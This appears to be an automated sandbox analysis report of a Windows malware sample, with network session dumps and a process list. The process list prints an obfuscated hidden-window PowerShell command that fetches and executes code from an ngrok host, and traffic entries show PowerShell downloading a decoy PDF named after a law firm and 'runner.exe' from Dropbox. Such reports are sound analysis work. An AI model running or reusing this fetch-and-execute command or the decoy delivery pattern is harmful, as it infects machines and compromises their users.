                                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                                              CF-RAY: 8eff05240f634316-EWR
                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49735 | 172.217.19.225 | 443 | 7552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:26 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-10 17:40:27 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Content-Length: 138356
                                                                                                                                                                                                                                                                                              X-GUploader-UploadID: AFiumC4J6TCUHaB4vHZh0xUuNyuZTRP74OTuNvyhfX-3NnOS1BLi6LlEqdKyjB_ciY1UI5FxAAbinHU
                                                                                                                                                                                                                                                                                              X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                              Expires: Wed, 10 Dec 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                              Age: 3327
                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                              ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                              Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              Data Ascii: Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4
                                                                                                                                                                                                                                                                                              Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea
                                                                                                                                                                                                                                                                                              Data Ascii: hKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@(
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98
                                                                                                                                                                                                                                                                                              Data Ascii: cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65
                                                                                                                                                                                                                                                                                              Data Ascii: 9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/message
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:27 UTC1390INData Raw: 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49739 | 162.125.65.18 | 443 | 8496 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:27 UTC | 246 | OUT | GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.dropbox.com
Connection: Keep-Alive
2024-12-10 17:40:28 UTC | 4091 | IN | HTTP/1.1 302 Found
Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; media-src https://* blob: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' [TRUNCATED]
Content-Type: text/html; charset=utf-8
Location: https://uc48b83ada642288f62fac023367.dl.dropboxusercontent.com/cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtb8rqKQvyuiDbpB-VdYP-6ND-6fxABcXlB3tMWgAdfASpXTaeR__Vb9ARDsyMetchbpNKDnaLRETh-2t55upVh299KdSqt_bR33vpX5w1Yp9d5_2bhsHbCKA9YhGbE/file?dl=1#
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: gvc=MTM0Mzc3Mzk1NzA3Mjg4ODQyMzY2NTIyMjUwNjg5MDk3OTQ0OTQ3; Path=/; Expires=Sun, 09 Dec 2029 17:40:27 GMT; HttpOnly; Secure; SameSite=None
Set-Cookie: t=dKX_aNGPV8Hy0NRN7Q2q7pbF; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:27 GMT; HttpOnly; Secure; SameSite=None
Set-Cookie: __Host-js_csrf=dKX_aNGPV8Hy0NRN7Q2q7pbF; Path=/; Expires=Wed, 10 Dec 2025 17:40:27 GMT; Secure; SameSite=None
Set-Cookie: __Host-ss=D-SZZkUJaM; Path=/; Expires=Wed, 10 Dec 2025 17:40:27 GMT; HttpOnly; Secure; SameSite=Strict
Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:27 GMT
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow, noimageindex
X-Xss-Protection: 1; mode=block
Content-Length: 17
Date: Tue, 10 Dec 2024 17:40:27 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
Server: envoy
Cache-Control: no-cache, no-store
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: edd0680c3e1244c1a7c1b3ebcbc96215
Connection: close
2024-12-10 17:40:28 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
Data Ascii: ...status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49773 | 162.125.69.15 | 443 | 8496 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:29 UTC | 370 | OUT | GET /cd/0/get/CgAeYk-ICNxgkqhNRIDHu4dsVrtb8rqKQvyuiDbpB-VdYP-6ND-6fxABcXlB3tMWgAdfASpXTaeR__Vb9ARDsyMetchbpNKDnaLRETh-2t55upVh299KdSqt_bR33vpX5w1Yp9d5_2bhsHbCKA9YhGbE/file?dl=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
Connection: Keep-Alive
2024-12-10 17:40:30 UTC | 761 | IN | HTTP/1.1 200 OK
Content-Type: application/binary
Accept-Ranges: bytes
Cache-Control: max-age=60
Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
Content-Security-Policy: sandbox
Etag: 1733684767914485d
Pragma: public
Referrer-Policy: no-referrer
Vary: Origin
X-Content-Security-Policy: sandbox
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex, nofollow, noimageindex
X-Server-Response-Time: 147
X-Webkit-Csp: sandbox
Date: Tue, 10 Dec 2024 17:40:30 GMT
Server: envoy
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Length: 106848
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: 55185f28389143c296eba6fccde0f7de
Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:30 UTC15623INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20
                                                                                                                                                                                                                                                                                              Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49795 | 162.125.65.18 | 443 | 8496 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:34 UTC | 212 | OUT | GET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: www.dropbox.com
2024-12-10 17:40:35 UTC | 4091 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Content-Security-Policy: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://pho [TRUNCATED]
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Location: https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com/cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3hIC7XtKyYfnYQtZl697h631aSu7BMPGgP8e3r3-JuxOvus4lwkahQAIsSoKq1oc0BdrqvfMvNrcfSVb6xuJU3btyi6jDr4ASGY_cplAVpFyHvoNbZGDcUjHMVgbQ/file?dl=1#
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                              Set-Cookie: gvc=Mjk3MDUwOTY2NTA2MTE1MzQ0NTA2NTI0NTI5NTA0NjI4MTIzNTA2; Path=/; Expires=Sun, 09 Dec 2029 17:40:34 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: t=KllsIpUSvLOUTk_CcP9IE_lz; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:34 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=KllsIpUSvLOUTk_CcP9IE_lz; Path=/; Expires=Wed, 10 Dec 2025 17:40:34 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-ss=V1PSzdoKIw; Path=/; Expires=Wed, 10 Dec 2025 17:40:34 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                              Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:34 GMT
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:35 GMT
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: e6b02e7ba1d0460a8735f73300abe2e6
                                                                                                                                                                                                                                                                                              Connection: close
2024-12-10 17:40:35 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
Data Ascii: <!--status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49811 | 162.125.69.15 | 443 | 8496 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:37 UTC | 370 | OUT | GET /cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3hIC7XtKyYfnYQtZl697h631aSu7BMPGgP8e3r3-JuxOvus4lwkahQAIsSoKq1oc0BdrqvfMvNrcfSVb6xuJU3btyi6jDr4ASGY_cplAVpFyHvoNbZGDcUjHMVgbQ/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
2024-12-10 17:40:38 UTC | 738 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe
                                                                                                                                                                                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              Etag: 1733821048842868d
                                                                                                                                                                                                                                                                                              Pragma: public
                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Server-Response-Time: 256
                                                                                                                                                                                                                                                                                              X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:37 GMT
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                              Content-Length: 1843712
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: d6ddcafcb66e49899a4380bf402a4fd9
                                                                                                                                                                                                                                                                                              Connection: close



                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                              Start time:12:39:58
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6af090000
                                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                                                              Start time:12:39:59
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                              Start time:12:39:59
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:12:40:16
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:12:40:17
Start date:10/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff7e52b0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:7
Start time:12:40:17
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2032,i,3747438541677274565,12230203629466347722,262144 /prefetch:3
Imagebase:0x7ff632ac0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:12:40:17
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
